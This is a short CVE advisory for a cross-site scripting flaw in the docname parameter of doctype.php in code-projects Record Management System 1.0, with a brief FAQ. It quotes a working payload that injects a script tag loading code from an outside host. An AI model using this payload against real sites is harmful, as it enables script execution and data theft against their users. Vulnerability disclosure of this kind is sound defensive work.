CVE-2023-7136: code-projects Record Management System Document Type doctype.php cross site scripting
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2023-7136?
CVE-2023-7136 has been classified as problematic, indicating a significant security concern.
How do I fix CVE-2023-7136?
To address CVE-2023-7136, ensure that all input handling is properly sanitized and validated to prevent exploitation.
What component is affected by CVE-2023-7136?
CVE-2023-7136 specifically affects the Document Type Handler functionality in the Record Management System 1.0.
Who is affected by CVE-2023-7136?
Users of the code-projects Record Management System version 1.0 are affected by CVE-2023-7136.
What type of vulnerability is CVE-2023-7136?
CVE-2023-7136 is a vulnerability involving the manipulation of input arguments which can lead to security issues.